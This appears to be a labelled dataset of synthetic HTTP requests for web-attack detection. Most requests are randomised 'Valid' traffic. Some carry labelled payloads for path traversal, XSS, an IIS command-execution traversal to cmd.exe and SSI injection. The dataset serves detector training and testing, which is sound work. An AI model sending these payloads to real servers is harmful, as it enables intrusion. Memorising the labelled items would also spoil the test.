GET /5LQ4Abetweenformm3R.tiff?i8zlagis=tsbwbin&Irnmwz0Haarcne=eoousAp&nz=i7OttnhhqkaMnhef&tiaa7cCa=th8reeiqsa&iapoeSkane=639&oqBVhox0F@N=NmywwtrivsltiNnIbi HTTP/1.1
Host: www.neieqraoE4.gov
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 248.202.62.202
Cookie: BKCVp7R4K=767;TwbK=aanozhtacces0d;uheb4aodefeaEhn=ir:0dlocatione[Rdhau);6cY3esissfsa=nQXyO;Ysg=86941
Cookie2: $Version="651"
Date: Tue, 20 Nov 07 09:34:23 GMT
ETag: "qQRgOPnnphH-XIbwa"
Expect: beat37B=A0efde;dosla
From: iarze6@uh4uku.biz
If-Modified-Since: Thu, 02 Aug 07 16:28:23 GMT
If-Unmodified-Since: Fri, 18 Apr 08 13:42:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1790
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM c2l3ZDVuc2VrN2VjYW5ldGx5aXpORXlFaHNvdmV0b2R0ZXNldTNza2Rzb2lkdQ==
Authorization: NTLM Njlubml6b2hyZGhlTWFhNWlqZE4yazJ0N3RhaDVSTmxlaHVTcjdtaTJudA==
Range: 43-,164-
Referer: http://www.seot.gov/arste/Tiaru/psrr4/eiguUi.exe
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: dapfp9hdeoayehre
UA-CPU: StrongARM
UA-Disp: 674,494,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7794x3946
Via: eii/0.0 132.24.251.93
Transfer-Encoding: identity
Upgrade: odtm/1.2, aeaecO/2.0, kiaadd/9.4, naysa/3.6
Warning: 811 www.lroqoi.shtml:7678 "achtda" "Thu, 03 May 07 03:52:45 UTC"
X-Forwarded-For: 146.71.117.9
X-Serial-Number: 22339968152502117473
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 23485
Start - Id: 15417
class: Valid
GET /fhttpsV@y_/don3ejee/sjXg3/jswrFhtIkiAq9/yNRwjN5VR1yBb/iE/e@5tJDZP08x3jekMFs/kxZEYVK/LXd-0d9plibn./tejoguP70sKFB.html?x1sdwtocheqlnt=htoipFlrotQkeu8fe&tonsh1=ibsie&LArYJ=keOetssd&jTaerewoXne=lLqxuU&JzEw=5665&A1mE0Pt=i06rrt+nt98&MDR=01631&@@XTGoPD=pY%7Elg+bofttreinputtnrv9&qhysutuLes5tS6t=204&o9hrr3aers=ieobject+2as%26&Gnbr=otginftz HTTP/1.0
Host: 158.125.53.33:258
Connection: keep-alive
Accept: application/*, image/*
Accept-Charset: x-mac-ce, iso-8859-1;q=0.1, x-mac-roman;q=0.9, shift_jis;q=0.7
Accept-Encoding: gzip;q=0.0, deflate, deflate
Accept-Language: G-c0f;q=0.5, s-m;q=0.4, NfSkdu-fsee;q=0.3
Cache-Control: no-transform
Client-ip: 16.33.14.251
Cookie: Yl5scriptNaservices1=35960417;wnc=pouMd0qjrynbznt
Cookie2: $Version="6"
Date: Fri, 17 Oct 08 08:46:14 GMT
ETag: W/"-FNt8ATarocCRF3"
Expect: 100-continue
From: hreEo@mhtthLrava.org
If-Modified-Since: Sat, 10 Jan 09 16:04:07 UTC
If-Unmodified-Since: Wed, 06 Oct 04 24:55:24 GMT
If-Match: *
If-None-Match: "noURyxDQYMMuhw5xi"
If-Range: "yPq@lZN7AIjujWZR"
Max-Forwards: 299
MIME-Version: 7.9
Pragma: ea='rNkwtt2'
Proxy-Authorization: Digest opaque="noelihmo"
Authorization: NTLM b2dHbG42cEs5c3MzYXJpOG94OHFIcXR0dHNlbWFMbG1pMDVld3dhcm9ubg==
Range: -590219
Referer: http://www.efcu.ch/twbnz/ioodiuei.mdb
TE: deflate
Trailer: Accept-Language
User-Agent: Mozilla/2.3 (Windows; U; Win98 3.1; co-sN; rv:4.8.0) Gecko/42674625
UA-CPU: Sparc
UA-Disp: 842,1582,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 743x937
Via: 0.3 www.h9Itpo.shtml, FTP/6.1 124.73.49.41, 2.2 www.q0en.html
Transfer-Encoding: compress
Upgrade: ncaer/8.0, rbkq/6.1, eos/1.0, ckiws/1.2, 6ln76s/2.0
Warning: 464 www.mnaweo.js "oneuxm" "Sat, 24 Jan 04 18:49:21 UTC"
X-Forwarded-For: 197.234.139.35
X-Serial-Number: 900758980528007
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15417
Start - Id: 15225
class: Valid
GET /bR.5wk1x5lm/uenrpepSah/eiwtotdA59two0f7ae5b/bBZmail7/lshcue/_gHWVuDFtZL/ayR9K1LM6pZ/uen.tiff? HTTP/1.1
Host: www.oAdpan.net
Connection: eeEjs
Accept: */*;q=0.8
Accept-Charset: ks_c_5601-1987, x-mac-korean
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: tE7nG=zqold
Client-ip: 169.143.137.176
Cookie: eju=processing-instructionch<e nli;fta8bawi=hlien;LOCSxl16=apZqpRz9;uuierbm=oujei5eewc2x
Cookie2: $Version="7"
Date: Fri, 09 Sep 05 03:14:08 GMT
ETag: W/"UM3IkIbhFRCKBh_TB"
Expect: edHrs=Alssa
From: Ono9sk1@8ieegshia.com
If-Modified-Since: Sat, 31 Dec 05 22:12:46 GMT
If-Unmodified-Since: Mon, 25 Jun 07 13:34:47 CET
If-Match: "PhBP.qKjBBsFI_oz"
If-None-Match: *
If-Range: Thu, 30 Mar 06 09:10:40 GMT
Max-Forwards: 7593
MIME-Version: 9.5
Pragma: lecrti='nhsncia3'
Proxy-Authorization: NTLM aHRrdU5ldGh0VWF3ZWl0SGdjcnlmckRhZTdnZnRFMzFrb2R5YWxlT3JnZQ==
Authorization: Basic bXRyOXhkOmZyaWV1TGFi
Range: 8-,6457-,15780-
Referer: /ittmoeu.asmx
TE: trailers,gzip,chunked;q=0.1
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.4 (Windows; U; Win 9x 8.5; 0o-lm; rv:0.2.7) Gecko/15016401
UA-CPU: StrongARM
UA-Disp: 450,4767,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1443x630
Via: gcedt/6.8 www.rrsO.png:5862, FTP/1.3 www.neL7.html
Transfer-Encoding: identity
Upgrade: sua0/7.7, pt9do4/4.0
Warning: 135 233.154.149.58:35015 "hpetgNt" 
X-Forwarded-For: 246.111.80.235
X-Serial-Number: 985452
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 15225
Start - Id: 45033
class: PathTransversal
POST /-2T_/Gr8nrvMstyle/fphVooAqjlQAt/o-oT8amMEeIH3Oqc0DF/cZKut0TyjWTolhOaE/ulTrienothnv/passthruB8xeYHA/a6nie/AynNa_RDLxchild/mruaareOsayl/i@e/9OE_T58STZZz7V.php3? HTTP/1.0
Content-Length: 113
Content-Language: HrdF
Content-Encoding: gzip
Content-Location: /foeNlt/onLNs.gif
Content-MD5: OGhFZTJzSUlubmVhZG9laQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Oct 06 03:54:16 UTC
Last-Modified: Fri, 17 Sep 04 14:35:13 GMT
Host: www.sr0r.de
Connection: close
Accept: text/xml;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: w-oho;q=0.4
Cookie: tqrgo=../../../rena/admin.txt;mlflRee=Cesp/mad6H7l
Date: Wed, 11 Mar 09 14:17:35 UTC
ETag: W/"vZ3Q66kuOTN3JtgQ8uk"
Expect: ania
If-Modified-Since: Fri, 03 Nov 06 01:42:39 CET
If-Unmodified-Since: Fri, 21 Jul 06 11:36:39 GMT
If-Match: *
If-None-Match: "fp.-CylQFrI5ng60vA"
If-Range: Tue, 20 Oct 09 11:27:09 GMT
Max-Forwards: 931
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: JnfSo p4thta=hsnlta
Authorization: Digest opaque="csfs"
Referer: /kxhsv9.mp3
TE: trailers,trailers,deflate
User-Agent: 4nhs3flcp6dlu7te
UA-Color: color16
Via: FTP/5.9 137.147.108.200, 2.1 11.75.12.204, 7.1 www.eitm.shtml
Upgrade: ado/3.2, itnor/6.3

de5aw2lyeiNuw=815&eAd7eld=efgm.rR&nteethc=gti&csslc06n0eIlqie=ntEopenwwIAeag0d5a| ae&3eOt=38&thryrzasq=06824476

End - Id: 45033
Start - Id: 15476
class: Valid
GET /60id1Iai/eL.YyOFtHjiG-d99/rDp.eZ3K8b1H/hRpaVJMwhttp/mHAuQID@hgD-Zk/snstpseiuscsnge.php3?1odbgmeFdshp5=1149743&t4dt=4 HTTP/1.1
Host: 93.198.133.40
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1255;q=0.5, cp-936
Accept-Encoding: compress;q=0.9, gzip
Accept-Language: isF7e-o3r, nanrhR-o;q=0.1, iGiohte-Apih;q=0.6, eoIhctoi-LiNhneh
Cache-Control: min-fresh=9
Client-ip: 8.102.178.123
Cookie: fcUKainputC9i=4;hyode=s 
Cookie2: $Version="67"
Date: Tue, 13 Oct 09 23:52:11 CET
ETag: "gVDck@JF@lrjNCQeS"
Expect: 100-continue
From: ob3Wdni@tbetshmkn.de
If-Modified-Since: Mon, 25 Apr 05 05:58:55 CET
If-Unmodified-Since: Wed, 17 Nov 04 09:32:54 UTC
If-Match: "dmXxL0mnlPn7OxEXGxAY"
If-None-Match: *
If-Range: Sun, 01 Jun 08 15:15:29 CET
Max-Forwards: 36
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: zS7e stsaewg=oet2
Authorization: NTLM czhFbWJ4aTJhcDdlb2VhZGRybmFUc2xIczljN2wzdXRYczVEaW9uZWVpYWg=
Range: 14-
Referer: http://lehtZe.st/ssimocs.zip
TE: trailers,deflate,gzip
Trailer: If-Range
User-Agent: Mozilla/7.7 (Machintosh; U; PPC 4.1; 94-ea; rv:6.3.5) Gecko/58706745
UA-CPU: Sparc
UA-Disp: 0411,934,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1725x7516
Via: 8.9 110.237.59.186, FTP/0.4 www.mD0gndot.htm, 7.9 www.45ntiSkh.html
Transfer-Encoding: deflate
Upgrade: eaI/4.2, peo/6.3, pyo/8.5, AiLo/3.3, eis/0.6
Warning: 740 www.tindaC.shtml:1990 "frsnphme2n4i5tcrd" 
X-Forwarded-For: 10.6.38.7
X-Serial-Number: 83246160630295135066
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15476
Start - Id: 22464
class: Valid
GET /ooNauii0alAmrotiay/kpw/HTctW/tMuf4tubatbhht/ladotrd03/s63aya/IBZn7c93update/ciframe0@7gi60Zx.gif? HTTP/1.0
Host: 16.173.86.190
Connection: wlonao
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=22
Client-ip: 234.147.240.217
Cookie: eselectuZxmlci2QKQG=ofnms6fclLg2dqncL;plsxj-=matdzohneuwhttp;noykfeack=auEsoBEMYISK;nisbpQtays=lNrn1+i
Cookie2: $Version="4"
Date: Mon, 21 Dec 09 20:46:36 GMT
ETag: W/"@op6jfoVbI8T3Tr9"
Expect: 100-continue
From: oh5chbe@53nslitm.fr
If-Modified-Since: Tue, 10 Feb 04 07:59:43 CET
If-Unmodified-Since: Wed, 16 Apr 08 14:03:57 GMT
If-Match: "DDWTcUdgKNsbj1fk"
If-None-Match: "jtrivLHHuCi9WT9NXx5j"
If-Range: Sun, 09 Dec 07 01:00:31 CET
Max-Forwards: 6376
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: lEjeuo sdifl=e6rluon
Range: -44773,6485-,-2
Referer: http://www.fqsln.uk/bstnetr/Dje6.php4
TE: gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/8.8 (Windows; U; WinNT 7.5; 4E-na; rv:6.4.7) Gecko/99519235
UA-CPU: Sparc
UA-Disp: 7995,8468,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 4211x5551
Via: 7.2 221.99.43.73, 6.4 73.81.80.51, 8.6 www.te4ei.js:53493
Transfer-Encoding: compress
Upgrade: arbvsn/8.3, 7phl/8.4, 6wl/2.6, obT/8.6, jme/8.5
Warning: 862 www.ol7W.htm "eRrAglLe" "Wed, 27 Apr 05 03:00:04 CET"
X-Forwarded-For: 10.200.53.236
X-Serial-Number: 5826747890581
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22464
Start - Id: 47615
class: XSS
GET /pwtNeeyBetTirE/s2MoAVBK9/ma0deklu/nLXIYy/ty0u0NsbjSel8pf5au.png?temejpAh=1768&wuet=aedjs&cNoij1pmode2weh=Lha%2F9%7Eor&lah=4371&mtRamAo=61&Cepo=8327974&eAy9essttema=e+httplwinnt88u%40seiet&lnretgyd=nt&nHaoTw=%3Cbgsound+src+++%3D%22+++++javascript%3A+++%5Balert++++%28%27r0%27%29%3B%5D%22++%3E&azza=it8ieickcSr0i&ia=vrailwo&9idroTneGinzim=22&ssnrhzrLhte=+aee1l&naJreaotflO7=av%40KeVK HTTP/1.0
Host: www.2sWdnaha.de
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: emses2r-7v;q=0.9
Cache-Control: no-cache
Client-ip: 254.77.17.52
Cookie: cLz5oNs6PX0= hd\ e1Sajspassthru gi;aees=744727555;8m=8667
Cookie2: $Version="4"
Date: Wed, 07 Apr 10 13:39:47 GMT
ETag: W/"Kz.c56L2CpIoHEh18fV"
Expect: 100-continue
From: drEnA@edtwavoDoa.com
If-Modified-Since: Mon, 24 Nov 08 17:55:18 UTC
If-Unmodified-Since: Mon, 03 Mar 08 02:30:33 UTC
If-Match: "AlnZlixlOIErmXKEI"
If-None-Match: "Yi3fWCu-Ug1kVBXdn-H"
If-Range: Mon, 03 Jul 06 05:25:50 GMT
Max-Forwards: 4721
MIME-Version: 8.3
Pragma: rqrr=aMkr8
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: Basic dGVubjpha3Rl
Range: 393273-
Referer: /aOra/eaaDnx/wbexht.doc
TE: chunked,trailers,trailers
Trailer: Expect
User-Agent: tfhe/7.4.8
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 608x141
Via: odqFet/0.8 42.129.81.157
Transfer-Encoding: identity
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 114 www.elevwen.jpg "oserePt" 
X-Forwarded-For: 19.35.93.68
X-Serial-Number: 2524902769036083814
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47615
Start - Id: 13752
class: Valid
GET /tteoEEar6/nR1vLoy6F/e5i5Isrr5edtnn8i/aob5_UcWvF4Jo85/eUgtLt/nA/iframeO3feMCOfkl/rrngartfo2/tz7a_eSLzPr8Jarks0.htm? HTTP/1.0
Host: 196.66.238.6
Connection: close
Accept: video/*;q=0.2, text/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 58.102.229.56
Cookie: Lttco=846;Fai4fabc0ahiked=ur;6sa=pscin;OKWUQkpdwhereC=4905;oyfeon7c=tHtPAf;shidEy=774486383
Cookie2: $Version="908"
Date: Tue, 24 Feb 04 19:40:01 CET
ETag: "7EGAWsyNqs6l79HTwfh"
Expect: a5oidQb=emahdise
From: gnhB9o@rfci.com
If-Modified-Since: Mon, 26 Apr 04 15:59:44 UTC
If-Unmodified-Since: Sat, 26 Mar 05 11:27:07 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 06 Apr 08 17:39:13 GMT
Max-Forwards: 279
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic ZWk2NWE0YTpzdG9tZTJodA==
Authorization: TIedih jneMf=xsneuio
Range: -876597,708-263,3085-
Referer: /esdhoji/yeeifa2/NntaxV/arls/wE4Eas.ace
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: osxl/9.3.4
UA-CPU: PowerPC
UA-Disp: 173,9492,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6985x6776
Via: esrho/2.8 107.196.37.132:0
Transfer-Encoding: deflate
Upgrade: l4tt/6.1, gtIh/6.6, nsetrs/8.9, h1ehro/2.2
Warning: 820 www.uproeo.htm "Ianeee" 
X-Forwarded-For: 60.68.206.39
X-Serial-Number: 26172268
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 13752
Start - Id: 20664
class: Valid
GET /Uve2-@Ptelnet/aLeZ/nsowOeoh6corroi/orCdFyJwWwmailF/0XiW5qLXlurGMREoF2P.cfm? HTTP/1.0
Host: 62.153.21.138
Connection: keep-alive
Accept: audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: er-nebei;q=0.9
Cache-Control: no-cache
Client-ip: 186.118.225.35
Cookie: 3y42eeln7R=Rys4ntbo1dtiT;eIaytnaueyqupEc= 8 roeval>/sA
Cookie2: $Version="411"
Date: Sat, 13 Mar 10 15:18:29 UTC
ETag: W/"Bn6eOYe9yVPtU0NkOL"
Expect: lzbae7l0=hRllsaku
From: ihe4r@bhoxbwdih.net
If-Modified-Since: Thu, 21 Jul 05 23:16:23 CET
If-Unmodified-Since: Thu, 26 Oct 06 23:55:11 UTC
If-Match: *
If-None-Match: "VlK4UmZi2oOERl4mz"
If-Range: Sun, 14 Mar 04 01:32:36 CET
Max-Forwards: 89
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest username="Dfhrr"
Authorization: Digest qop=ngruisi
Range: 28-,-887274
Referer: /aoiaen/geb5esab/twtt/ampxh/oAmn.php4
TE: chunked;q=0.8,gzip;q=0.9
Trailer: Max-Forwards
User-Agent: a.UAMxMj9 http://www.3sereik.de
UA-CPU: PowerPC
UA-Disp: 268,853,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 060x083
Via: gqsoir/6.6 www.tolSfmyt.html, 0.9 152.39.0.143
Transfer-Encoding: ttTg
Upgrade: uetty/9.5, 9so2/7.4, stjts/1.7, yh7t/7.0
Warning: 161 www.yspael.tiff:6088 "aiusaddtrh" "Sat, 10 Jun 06 17:32:05 UTC"
X-Forwarded-For: 122.67.136.152
X-Serial-Number: 7399609
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20664
Start - Id: 14252
class: Valid
GET /ceddp/OIjQWPsbadmin/nj4DY24m-I24dwyQ@a/jformjpinclude2/IAwindow.open/olTiF.mspx?b9Runnei3eIysu=9&Etrrtido=rdroppOaccept0a&4O.HVEY5x=%5C9l&aahooaaoewvn3i=9478109&ey4oDdhoPpot=3153973&9AVWWDservicesNjSu=iiwnminso&gGToD9abetweenA=zmzm3&tbr=nALm5 HTTP/1.1
Host: www.ZerwaetD.cz:52
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 219.6.116.55
Cookie: DjxpyMWh=oe
Cookie2: $Version="18"
Date: Sat, 29 Jan 05 05:28:19 GMT
ETag: W/"9NYTjtyVsu4-K5pmEI4C"
Expect: 100-continue
From: faeootnr@3EygNeo.st
If-Modified-Since: Thu, 30 Sep 04 17:56:42 UTC
If-Unmodified-Since: Tue, 02 Jan 07 08:06:20 UTC
If-Match: "tqN08togsBE1frkY"
If-None-Match: "q1ma5.GvCTAGWTXNW"
If-Range: Fri, 31 Aug 07 06:07:36 CET
Max-Forwards: 04
MIME-Version: 4.0
Pragma: md=9rwyao
Proxy-Authorization: NPoh rEbi=eefingh
Authorization: Basic bzA2ZTphaWhvZUlpdA==
Range: 7-,5-9868,37-
Referer: http://yfcdjr.ch/Dbta/afetdht/oa2oedt/5liR7nE.bin
TE: trailers,gzip;q=0.8,gzip;q=0.6
Trailer: Accept-Language
User-Agent: eregwthymidtdostit
UA-CPU: MIPS
UA-Disp: 985,925,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 152x464
Via: HTTP/3.7 www.arutrq.html, 3.5 www.Jssx.htm:14863
Transfer-Encoding: deflate
Upgrade: cuWv/5.1, Damt/8.7, nbrs3r/2.2, tiufr/9.4
Warning: 482 www.dteiali.shtml:34586 "rnd1al6ictu0nowrr4hN" 
X-Forwarded-For: 177.22.102.112
X-Serial-Number: 3726614000
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14252
Start - Id: 12476
class: Valid
GET /HyUXw2HN0a/tF/ahdDnaIeu/bl2n/J7HDE/27nh/ay/PMVfE7cVwgetKT/8inputBHobject_D@EHb/eSzqYeefbqs4Yk.js?chEynn=9&onniolf=fW6n%402&ymohhacurusimoc=01768435&ilzqrsuteron1=c8iohvER&Jh_D-exec=4&tTet29k=o%40itlt3&wht=narrdi%28%3CdoOamnc+&YNqdt=ota3orvseoioo3&esdrwnnE=a29mh HTTP/1.1
Host: www.u4Se.gov:80
Connection: lnatm
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesetrad, x-mac-arabic;q=0.3, windows-874;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale=44
Client-ip: 71.219.22.11
Cookie: _VUDcBSIUv=43
Cookie2: $Version="4"
Date: Fri, 06 Mar 09 11:19:33 GMT
ETag: W/"ysFV2@WM0CqMD-G"
Expect: eoaA3tio=as6onmf;mi3td5g1=eeT7
From: a0lewqe@txeohoo.be
If-Modified-Since: Fri, 21 Apr 06 15:18:01 GMT
If-Unmodified-Since: Wed, 07 Jan 09 05:33:45 UTC
If-Match: *
If-None-Match: "UZII4pT.z7DojM7xT5"
If-Range: Thu, 17 Sep 09 13:03:01 GMT
Max-Forwards: 50
MIME-Version: 5.9
Pragma: tmg='t'
Proxy-Authorization: Digest qop=ttetoa
Authorization: NTLM d2l0RXRubmdycGZyaHN5c3M5NGZjZW1zdTlscml0dEt0U3R0aGVzcmVkYXNh
Range: 3-331
Referer: http://www.aii1.st/lre6x.conf
TE: chunked
Trailer: Upgrade
User-Agent: Mozilla/8.9 (compatible; MSIE 0.4; WinNT; sPnoiee2so; uht2ENey; 8dserel)
UA-CPU: StrongARM
UA-Disp: 711,789,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 163x254
Via: FTP/8.8 www.wbatcti.jpg:76, 4.5 254.107.73.65
Transfer-Encoding: deflate
Upgrade: leln4g/2.4
Warning: 997 139.90.117.24 "bnqtnmr9rievi" 
X-Forwarded-For: 145.136.143.164
X-Serial-Number: 863262
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12476
Start - Id: 43911
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.1
Host: www.ldaiaVh.fr
Connection: keep-alive
Accept: text/xml, application/*;q=0.5
Accept-Charset: utf-8, iso-8859-15;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 109.23.226.147
Cookie: lzxi79Lu=systemdene( ;oe;ov4CystyleVul=22
Cookie2: $Version="45"
Date: Wed, 22 Nov 06 03:11:46 GMT
ETag: "m.Xsix2eYp_WcagM1-r"
Expect: slnliT
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Tue, 14 Jun 05 24:13:49 CET
If-Unmodified-Since: Sat, 26 Jan 08 06:20:32 UTC
If-Match: *
If-None-Match: "s_elzsq_CrI0TpYbO"
If-Range: Fri, 18 Sep 09 03:00:29 GMT
Max-Forwards: 5919
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: I7d4 pxamohog=uiio
Authorization: jaier uicSij=Hxcaxs
Range: 6652-,-36477,66590-93
Referer: /tslo/oscxeoS/efcgatle/dldnscak/iOnee.php4
TE: trailers,chunked;q=0.3
Trailer: Upgrade
User-Agent: Mozilla/2.5 (Windows; U; Win98 9.5; 9d-gs; rv:9.7.1) Gecko/56523522
UA-CPU: StrongARM
UA-Disp: 0478,357,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 349x5070
Via: HTTP/4.0 50.133.50.36
Transfer-Encoding: compress
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 501 123.151.211.66 "eDet3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43911
Start - Id: 39320
class: SSI
GET /hr43G6G/rotae/otmJMKo4mTKKhffdTjPA/meeysxhisCtdjnuaCs/tD2/glTo/csxsonoueeasrhdik/nxiNwc4JVIQcUi-3qB0/EyritooskdhDar8d/s0tXAbCealEXjU2.png?eaA26ito8i6n=e&lrssaamw=%3C%21--%23email+fromhost%3D%22www.nofsAs1y.com%22+tohost%3D%22mailbox.e21tk.com%22+message%3D%2221izsi+rendeMe+fuEeht+hstiw%22+fromaddress%3D%22eeeroe.com%22+toaddress%3D%220etOs.Heuhes.com%22+subject%3D%22l%22+sender%3D%22twre.com%22+replyto%3D%22areRNr.com%22+cc%3D%22oi%22+inreplyto%3D%22htrur+o7r+ehs4%22+id%3D%22ioetImail%22+--%3E&T3KYPoe=mdfIGrmoOhy5irm&tKv6X7=ca&ni1br=-talla&hU=654683&J2UwmHXconnectshutdownBU=tlraiyi2lm&ohHase=2&ci=voto9&odty4orH5tchghc=wcatwp-&gaeeterqko3y=lF&6@F-=pf%40SkKx1B8G HTTP/1.1
Host: www.unajfwe.biz
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: SNoed-mes5;q=0.2, re3-wirq5Mh
Cache-Control: no-store
Client-ip: 11.92.216.73
Cookie: radasdashUgon=npsase&i\ah>7;obect3thlp1=ebjwCZ;lxskCbieHrun=Nd0r7t
Cookie2: $Version="904"
Date: Fri, 21 Oct 05 10:44:55 CET
ETag: "1pA1U.J7IAhA3yekD"
Expect: 100-continue
From: iltesrft@iaCi.uk
If-Modified-Since: Mon, 26 Jan 09 23:37:04 CET
If-Unmodified-Since: Thu, 18 Dec 08 19:45:20 GMT
If-Match: *
If-None-Match: *
If-Range: "BA0pCKP6iZ1-BYghy"
Max-Forwards: 2
MIME-Version: 9.8
Pragma: ir6oae='Nrxln'
Proxy-Authorization: hlfen oikmebat=iyvtk
Authorization: Digest realm
Range: 326-,2201-0740,2-99478
Referer: /gecep6/n1u78ws/Mdxbn.css
TE: deflate,chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 8.3; ah-eb; rv:1.8.3) Gecko/53649290
UA-CPU: MIPS
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9132x248
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: gzip
Upgrade: eseht/3.5, trmE/1.3
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 84.135.253.198
X-Serial-Number: 802337450581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39320
Start - Id: 33786
class: Valid
POST /vl/ztArtaecesxc52wnis/vetsnxt5iTsh9dQj/nJGW2mWePNvTuTy2-WrA/a8Kqwr59DsRBWiS/jamh/iSE1chyssqiIMmeez7/snhre3e0/0736oh_m@D_/fwLsaetngs49ae/1GYKF_VF.kRF.bin? HTTP/1.1
Content-Length: 136
Content-Language: 2n6ltotz,Atffnk4
Content-Encoding: gzip
Content-Location: http://trtr9h.org/ttz2o3/fiuCer.php3
Content-MD5: aWxhaW0xdGVlbmNReGFoUA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Nov 07 04:00:34 CET
Last-Modified: Thu, 26 Apr 07 21:42:01 UTC
Host: www.c7mhsasm.de:07234
Connection: or0eKn
Accept: image/jpeg;q=0.9, application/*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.3
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 165.218.61.59
Cookie: cldre2tta=0naWgSC2BtD;ahreioee8tetpts=0743;kobc=44;tn1ahtutcucgs=249
Cookie2: $Version="26"
Date: Thu, 02 Mar 06 22:41:08 UTC
ETag: W/"JQn0iddRThZH-WfaUnK_"
Expect: c9cyhx
From: hoHei@sTshLltba.st
If-Modified-Since: Tue, 11 Nov 08 04:58:03 GMT
If-Unmodified-Since: Sat, 22 Nov 08 17:47:51 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3730
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: dnar oricoou=Orhtma
Authorization: irmhdn qexot1s=gloi3uob
Range: 26855-,847-,-23
Referer: http://www.breieS.ch/ltnya/9nestooq/hyids/eSotuH3.nsf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.1 (X11; U; Linux i586 9.8; nn-ne; rv:3.5.1) Gecko/35093230
UA-CPU: StrongARM
UA-Disp: 384,417,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 402x308
